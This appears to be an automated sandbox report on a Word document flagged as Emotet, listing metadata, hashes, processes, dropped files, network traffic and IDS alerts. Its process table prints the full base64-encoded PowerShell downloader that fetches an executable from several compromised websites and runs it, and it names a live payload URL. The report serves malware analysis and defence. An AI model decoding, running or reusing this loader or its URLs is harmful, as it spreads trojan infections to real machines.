File name: | DOCUMENT_8994751.doc |
Full analysis: | https://app.any.run/tasks/495084c6-a674-4195-b313-1dd86f90090e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 20, 2020, 12:35:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Odit., Author: Rayan Guillot, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 20 07:24:00 2020, Last Saved Time/Date: Tue Oct 20 07:24:00 2020, Number of Pages: 1, Number of Words: 2599, Number of Characters: 14816, Security: 8 |
MD5: | EACE6619E701F95942169DC757F8263D |
SHA1: | F4CF601B1699767938812E71040E4F39C5C65BB8 |
SHA256: | 8BE10269732FD1D76955A97DA47A71CDD76FE08BCE15EA71827905BB2E093FEC |
SSDEEP: | 3072:NOr++urKzWWigMoP/8FJ94rf1nFJsVllZ1Uyi8UwdzhLYo/cNJivKie6B/w2yiWN:SJiP/w2PoCLpZY0tRhoP |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Odit. |
---|---|
Subject: | - |
Author: | Rayan Guillot |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:10:20 06:24:00 |
ModifyDate: | 2020:10:20 06:24:00 |
Pages: | 1 |
Words: | 2599 |
Characters: | 14816 |
Security: | Locked for annotations |
Company: | - |
Lines: | 123 |
Paragraphs: | 34 |
CharCountWithSpaces: | 17381 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2976 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\DOCUMENT_8994751.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3480 | POwersheLL -ENCOD cwBlAHQALQBJAHQARQBNACAAKAAiAFYAYQByAEkAQQBCACIAKwAiAEwAZQAiACsAIgA6ACIAKwAiAHUAdABXAEYAcAAiACkAIAAoACAAWwB0AHkAcABFAF0AKAAnAHMAWQBzAHQAZQBNACcAKwAnAC4ASQBPAC4AJwArACcARABpAHIAZQBjAFQAJwArACcATwByAHkAJwApACAAKQAgADsAIAAgACQASgBlADMAWgBUAD0AIABbAFQAeQBQAGUAXQAoACcAUwB5AHMAVAAnACsAJwBlACcAKwAnAE0ALgBuAEUAVAAuAFMARQAnACsAJwBSAHYAaQBDACcAKwAnAEUAUABPACcAKwAnAEkATgAnACsAJwB0AE0AYQBOACcAKwAnAGEAJwArACcARwBFAHIAJwApACAAIAA7ACAAIAAkADIAagB4AEYAPQAgACAAWwBUAFkAUABFAF0AKAAnAHMAWQBTAHQAZQBtACcAKwAnAC4ATgAnACsAJwBlAHQALgAnACsAJwBzAGUAQwB1ACcAKwAnAHIAaQB0AHkAUAByAG8AdABvAEMAbwAnACsAJwBMAFQAJwArACcAWQBQACcAKwAnAGUAJwApADsAIAAgACQAUABhAGkAMgBmAHoANQA9ACgAJwBJAHQAYgA0AG0AJwArACcAYwA4ACcAKQA7ACQATABmADkAOQBzAHQAdgA9ACQARAA5AGwAMgAwAGQAMAAgACsAIABbAGMAaABhAHIAXQAoADgAMAAgAC0AIAAzADgAKQAgACsAIAAkAEIANQBrAHoAMgAwADAAOwAkAEUAMABsAHIAawA1AGwAPQAoACcAVgA5AF8AcQAnACsAJwAwACcAKwAnAHUAeAAnACkAOwAgACgAZwBFAHQALQB2AGEAUgBJAEEAYgBsAGUAIAAoACcAVQAnACsAJwBUAHcARgBwACcAKQAgACAALQBWAGEATAApADoAOgBjAFIAZQBhAFQAZQBkAEkAcgBlAEMAVABvAHIAeQAoACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAIAArACAAKAAoACcAewAnACsAJwAwAH0ASwB4ACcAKwAnAGEAbAAnACsAJwAwAF8AJwArACcAbgB7ADAAfQBZACcAKwAnAGYAbwA2AG8AMgAwAHsAMAB9ACcAKQAgACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQARwA2ADEAcgBwAGkAYQA9ACgAJwBCACcAKwAnAHIAJwArACcAegBsAG8AZQBtACcAKQA7ACAAJABqAGUAMwB6AHQAOgA6AFMARQBDAFUAcgBpAFQAeQBQAFIAbwB0AG8AYwBPAEwAIAA9ACAAIAAoACAAQwBIAGkATABEAEkAdABlAE0AIAAgACgAIgBWAGEAUgAiACsAIgBpACIAKwAiAGEAYgBsAEUAOgAyAGoAIgArACIAWABGACIAKQApAC4AdgBBAEwAVQBlADoAOgBUAGwAUwAxADIAOwAkAE8AbgB3AG8AMgBxAGoAPQAoACcAUQB2ACcAKwAnADkAJwArACcAYQBlAHQANAAnACkAOwAkAFQAbwA0AGgANgBlADUAIAA9ACAAKAAnAEUAbwBxADcAaQBzACcAKwAnAGoAJwApADsAJABZADQAcAA1AGYAXwBtAD0AKAAnAFAAJwArACcAdwA3ACcAKwAnAHYAOQBqAGYAJwApADsAJABQAHAANQA2AGwAYQBvAD0AKAAnAFIAaABmACcAKwAnAF8AeQBxACcAKwAnAGUAJwApADsAJABCADEAbwAyAG4AXwBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAGEARgAnACsAJwBvAEsAeAAnACsAJwBhAGwAMABfAG4AYQBGAG8AJwArACcAWQBmACcAKwAnAG8ANgAnACsAJwBvACcAKwAnADIAMABhAEYAbwAnACkALgBSAEUAcABMAEEAQwBlACgAJwBhAEYAbwAnACwAJwBcACcAKQApACsAJABUAG8ANABoADYAZQA1ACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABDAHgAcQA5AGEAcABnAD0AKAAnAEcAaQBwAHMAJwArACcAeABoAHUAJwApADsAJABHADgAdQByAHYANABzAD0AbgBgAGUAVwAtAE8AYABCAEoAZQBDAFQAIABuAGUAVAAuAFcARQBCAEMAbABpAEUATgBUADsAJABZAF8AOQAwAGYAOQA3AD0AKAAnAGgAdAB0AHAAOgAnACsAJwAvACcAKwAnAC8AJwArACcAbQB5ACcAKwAnAGEAbgAnACsAJwBtAGEAcgBsAGUAZwBhAGwAJwArACcAcwAnACsAJwBlACcAKwAnAHIAdgAnACsAJwBpACcAKwAnAGMAZQBzAC4AYwBvAG0AJwArACcALwB3AHAALQAnACsAJwBhACcAKwAnAGQAbQAnACsAJwBpAG4ALwAzAGgALwAqACcAKwAnAGgAJwArACcAdAB0ACcAKwAnAHAAOgAvAC8AZABhAHQAYQAnACsAJwBpAG4AcwAnACsAJwBpACcAKwAnAGcAaAAnACsAJwB0AC4AJwArACcAawAnACsAJwByAC8AYwBvACcAKwAnAG4AdABhAGMAdAAvAE0ARwBYACcAKwAnAFgAeAAvACoAJwArACcAaAB0AHQAcABzADoALwAvAGMAbABlACcAKwAnAGEAbgBtAHkAJwArACcAcAAnACsAJwBsAGEAYwBlAC4AJwArACcAaQBuAC8AYQBkACcAKwAnAG0AJwArACcAaQBuAC8AbAAnACsAJwA2ACcAKwAnAGkAQwAvACoAJwArACcAaAAnACsAJwB0AHQAJwArACcAcABzACcAKwAnADoALwAvACcAKwAnAG4AZQAnACsAJwB3AC4AZwB5ACcAKwAnAG0AJwArACcAbQAnACsAJwB1ACcAKwAnAHMAJwArACcAYwAnACsAJwBsAGUALgAnACsAJwB0ACcAKwAnAGsALwByAGUAJwArACcAZwBlACcAKwAnAG4AYwB5ACcAKwAnAC0AZgAnACsAJwBpACcAKwAnAHIAJwArACcAZQBwACcAKwAnAGwAYQBjACcAKwAnAGUALwBjACcAKwAnAFAAJwArACcAVgBkAGwALwAqAGgAdAB0ACcAKwAnAHAAcwA6AC8ALwB0AGgAJwArACcAZQA4ADQAaABvAHQAZQBsAC4AJwArACcAYwBvAG0ALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AMgAnACsAJwA3AC8AKgBoAHQAdABwADoALwAvAGQAaQBuAGEAbQAnACsAJwBvACcAKwAnAGMAcwAuAGMAbwBtAC4AJwArACcAYgByAC8AZwBpAG4AcwAnACsAJwBlAG4AZwAtACcAKwAnAHAAJwArACcAcgBpAGMAZQBzACcAKwAnAC8AUgBOAEsAJwArACcASQAnACsAJwBpAE8ALwAqACcAKwAnAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZQBkAHUAbQAnACsAJwBhADIALgBjACcAKwAnAG8AJwArACcAbQAvACcAKwAnAG8AbgB0ACcAKwAnAGEAcgBpACcAKwAnAG8AMgAuAGMAbwBtACcAKwAnAC8AcgBmAGUAJwArACcAVwAvACoAaAAnACsAJwB0ACcAKwAnAHQAcAAnACsAJwBzADoALwAnACsAJwAvAGMAJwArACcAaAByAGkAcwB0AGkAYQBuAHMAdQB0AHQAJwArACcAZQByAC4AYwBoAC8AdwBwAC0AJwArACcAaQAnACsAJwBuACcAKwAnAGMAbAAnACsAJwB1ACcAKwAnAGQAZQBzAC8AJwArACcASQAvACcAKQAuAFMAUABMAEkAVAAoACQARwB5AGwANQB5AG8AeQAgACsAIAAkAEwAZgA5ADkAcwB0AHYAIAArACAAJABLADgAZgA5ADYAbQBiACkAOwAkAE0ANQByAGwANQBpADQAPQAoACcARwAnACsAJwBoAHcAYwB3ADgANwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEYAZgA3AHIAMABqAF8AIABpAG4AIAAkAFkAXwA5ADAAZgA5ADcAKQB7AHQAcgB5AHsAJABHADgAdQByAHYANABzAC4AZABPAHcAbgBMAE8AYQBEAEYAaQBsAGUAKAAkAEYAZgA3AHIAMABqAF8ALAAgACQAQgAxAG8AMgBuAF8AbwApADsAJABRAGkAMgBhAGYAbABvAD0AKAAnAFoAJwArACcAdAB0AGUAagAnACsAJwBpADQAJwApADsASQBmACAAKAAoAGcAZQBUAGAALQBgAEkAdABlAG0AIAAkAEIAMQBvADIAbgBfAG8AKQAuAGwAZQBOAEcAVABoACAALQBnAGUAIAAzADgAMwAxADEAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAJwB3AGkAbgAnACsAJwAzADIAJwArACcAXwBQAHIAbwBjAGUAcwAnACsAJwBzACcAKQApAC4AQwBSAEUAYQBUAGUAKAAkAEIAMQBvADIAbgBfAG8AKQA7ACQARwBhADQAMQBqAGQAYgA9ACgAJwBEACcAKwAnAHUAJwArACcAcgA0AHYAbABzACcAKQA7AGIAcgBlAGEAawA7ACQAUwBrAHcAdwBhAF8AZwA9ACgAJwBVAG0AbAAxACcAKwAnAHoAOAAnACsAJwBhACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA3AG0ANwBjADEAbwA9ACgAJwBTACcAKwAnAGYAYQAyADgAOABvACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3156 | C:\Users\admin\Kxal0_n\Yfo6o20\Eoq7isj.exe | C:\Users\admin\Kxal0_n\Yfo6o20\Eoq7isj.exe | — | wmiprvse.exe |
User: admin Company: Twenty Squares Integrity Level: MEDIUM Description: Addictedsarah chaturbate iree token Exit code: 0 Version: 1.00 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR54AC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3480 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2VJTCT6AX2BK68FXY5HT.temp | — | |
MD5:— | SHA256:— | |||
3156 | Eoq7isj.exe | C:\Users\admin\AppData\Local\Temp\~DF70526DD78B5B1E50.TMP | — | |
MD5:— | SHA256:— | |||
3480 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1ACB5C67FDBAC9D9393CFB80E89AA4C4 | SHA256:52A5D9598FAE7943D29A9034E00CB59326EDE82055877DAC9460F791B5E6A472 | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:AEB89835EF5C8186077076004A20AF22 | SHA256:1CC75C7E5703726EE33A14728D6E2C7240B43C5B72B370DE19BBA4C3846526EE | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:1BA2047048E91EDB1110E573CFAAE418 | SHA256:2FE9C7298A68453C33FC546050BFF27603F3210DB7F39B7536DA054261E78A6E | |||
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\DOCUMENT_8994751.doc.LNK | lnk | |
MD5:9EEA141D3BBF7BECB26777D49B48037D | SHA256:13D6125498A86421A73EA7528F762EE66C70FF5827F7DA6B24A2262E8069660D | |||
3480 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16644c.TMP | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
2976 | WINWORD.EXE | C:\Users\admin\Desktop\~$CUMENT_8994751.doc | pgc | |
MD5:A62227B155E775B2DF694E93970D84D5 | SHA256:B71EE8DFF9D3DC34F6077F171A9D3F8B290D58EC9F234EB16F3D44FFCBB43E41 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3480 | POwersheLL.exe | GET | 200 | 27.254.111.200:80 | http://myanmarlegalservices.com/wp-admin/3h/ | TH | executable | 336 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3480 | POwersheLL.exe | 27.254.111.200:80 | myanmarlegalservices.com | CS LOXINFO Public Company Limited. | TH | suspicious |
Domain | IP | Reputation |
---|---|---|
myanmarlegalservices.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3480 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3480 | POwersheLL.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3480 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3480 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |